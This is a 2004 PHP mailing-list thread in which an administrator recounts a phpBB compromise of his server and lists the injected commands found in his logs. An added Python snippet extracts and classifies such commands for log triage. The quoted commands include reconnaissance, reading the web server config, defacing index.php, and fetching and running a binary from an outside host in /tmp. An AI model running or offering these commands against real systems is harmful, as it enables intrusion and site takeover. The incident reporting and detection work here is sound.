Thanks
-pa
----- Original Message ----- From: "John Nichel" <jnichel@xxxxxxxxxx>
To: "PHP Mailing Lists" <php-general@xxxxxxxxxxxxx>
Sent: Wednesday, December 22, 2004 5:46 PM
Subject: Re: PHP Exploit via phpBB?
John Holmes wrote:
From: John Nichel <john@xxxxxxxxxxxx>
I'm currently going through logs from previous days to see if I was getting this 'attack' before upgrading to php v4.3.10.
That's why I wanted to post this here...just in case it isn't a phpBB problem.
Many people were trying to tie the vulnerabilities in PHP 4.3.9 to this attack on the vulnerabilities in phpBB, but from what I read they were unrelated. Are you on a shared server at all? It may be possible that someone else got attacked and took everyone with them...
Yeah, I had been reading about that, but this didn't happen until after I upgraded to 4.3.10. I had upgraded to phpBB 2.0.11 about two weeks ago. That was confusing the hell out of me...here I was using the most recent versions of both phpBB and PHP 4.x, and it still happened...not to mention it happening about 1.5 hours after upgrading php. We're on a dedicated box, and my Rush site is the only one running phpBB, and after digging for the rest of today, I found that it was definitely the fault of phpBB. This post was pointed out to me by a list member...
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
So I made that change too, even though I *thought* it was changed in v2.0.11. Course, I probably screwed something up when patching the files. ;) I disabled the system() function too, just in case. These are all the system calls it made...
echo ___INICIO___;uname -a;echo ___FIM___;
echo ___INICIO___;cat /proc/cpuinfo;echo ___FIM___;
echo ___INICIO___;cat /usr/local/apache/conf/httpd.conf;echo ___FIM___;
echo ___INICIO___;cat /usr/local/apache/;ls;echo ___FIM___;
echo ___INICIO___;echo hh > hac.hrml;ls;echo ___FIM___;
echo ___INICIO___;echo H4ck3rSBR ownz your by xdr0p455 > index.php;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;mv -f index.php /webserver/vhosts/by-tor.com/docs/index.php;echo ___FIM___;
echo ___INICIO___;cd /tmp;wget http://www.intranorth.com.br/xpl/r0nin;chmod 777 r0nin;./r0nin;echo ___FIM___;
echo ___INICIO___;pwd;echo ___FIM___;
echo ___INICIO___;id;echo ___FIM___;
I'm still trying to figure out how it found all the rest of my vhosts on that box. I see it did a cat /usr/local/apache/conf/httpd.conf to try and read my Apache config file, but mine doesn't live there. It also downloaded a file from a Brazilian website, and executed it in the /tmp directory...I deleted all of those, but saved one to 'play' with later.
With any luck, someone else will read through this, and maybe they'll be luckier than I.
-- By-Tor.com ...it's all about the Rush http://www.by-tor.com
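The injected commands above are all wrapped in the same echo ___INICIO___ / echo ___FIM___ markers, which makes the wrapper itself a usable signature when going back through logs. The following is an added example (not code from the thread or from phpBB) that extracts the wrapped commands from log text and tags each one with what it is doing; the sample entries are constructed to mirror the ones quoted above, with the download host replaced by a placeholder.

```python
import re

# Constructed sample entries modelled on the command log quoted in the thread;
# the real download host is replaced with a placeholder, so these are not the original lines.
SAMPLE_LOG = """\
echo ___INICIO___;uname -a;echo ___FIM___;
echo ___INICIO___;cat /usr/local/apache/conf/httpd.conf;echo ___FIM___;
echo ___INICIO___;echo defaced > index.php;echo ___FIM___;
echo ___INICIO___;cd /tmp;wget http://placeholder.invalid/xpl/dropper;chmod 777 dropper;./dropper;echo ___FIM___;
echo ___INICIO___;id;echo ___FIM___;
"""

# The attacker's tool delimited each command's output with these markers,
# so the wrapper is a reliable signature for this particular campaign.
WRAPPED = re.compile(r"echo ___INICIO___;(?P<body>.*?);echo ___FIM___;")

# Defender-side classification of what sits between the markers.
SIGNALS = {
    "recon":       re.compile(r"(^|;)\s*(uname|id|pwd|cat /proc/cpuinfo)\b"),
    "config-read": re.compile(r"\bcat\b.*httpd\.conf"),
    "defacement":  re.compile(r">\s*index\.php\b|\bmv\b.*index\.php"),
    "download":    re.compile(r"\b(wget|curl)\b"),
    "exec-in-tmp": re.compile(r"\bcd /tmp\b.*\./"),
}


def extract_commands(log_text):
    """Return the command strings found between the INICIO/FIM markers."""
    return [m.group("body") for m in WRAPPED.finditer(log_text)]


def classify(command):
    """Return the sorted list of signal names that match one command string."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(command))


def triage(log_text):
    """Pair each wrapped command with its signals; lines without the wrapper are ignored."""
    return [(cmd, classify(cmd)) for cmd in extract_commands(log_text)]


if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE_LOG):
        print(f"{','.join(tags) or 'none':<22} {cmd}")
```

Feeding real access or audit logs through triage() will surface only entries carrying the marker wrapper; commands without it are intentionally skipped.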
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php